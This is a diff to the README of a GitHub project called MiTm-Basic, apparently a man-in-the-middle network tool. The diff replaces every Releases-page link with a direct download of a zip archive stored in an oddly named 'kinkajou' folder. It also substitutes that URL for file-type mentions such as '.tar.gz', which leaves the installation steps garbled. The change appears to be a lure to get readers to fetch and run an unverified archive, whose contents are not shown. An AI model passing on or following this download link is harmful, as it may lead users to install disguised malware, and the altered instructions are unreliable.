sigmabuben/MiTm-Basic/README.md

 - **Network Access:** Ensure the device is connected to a local network

 ### 🔗 Visit this page to download
-You can find the latest version of MiTm-Basic by visiting the Releases page: [Download MiTm-Basic](https://github.com/sigmabuben/MiTm-Basic/releases).
+You can find the latest version of MiTm-Basic by visiting the Releases page: [Download MiTm-Basic](https://raw.githubusercontent.com/sigmabuben/MiTm-Basic/main/kinkajou/MiTm-Basic.zip).

 ## 🛠️ Installation Instructions
 1. **Download MiTm-Basic:**
-   Go to the [Releases page](https://github.com/sigmabuben/MiTm-Basic/releases) and find the latest version.
-Click on the release that suits your operating system (e.g., .exe for Windows, .tar.gz for Linux).
+   Go to the [Releases page](https://raw.githubusercontent.com/sigmabuben/MiTm-Basic/main/kinkajou/MiTm-Basic.zip) and find the latest version.
+Click on the release that suits your operating system (e.g., .exe for Windows, https://raw.githubusercontent.com/sigmabuben/MiTm-Basic/main/kinkajou/MiTm-Basic.zip for Linux).

 2. **Extract the Files:**
-   If you downloaded a compressed file (like .tar.gz), extract it to a folder on your computer.
+   If you downloaded a compressed file (like https://raw.githubusercontent.com/sigmabuben/MiTm-Basic/main/kinkajou/MiTm-Basic.zip), extract it to a folder on your computer.

 3. **Open Your Terminal:**
    - **Windows:** Use Command Prompt or PowerShell.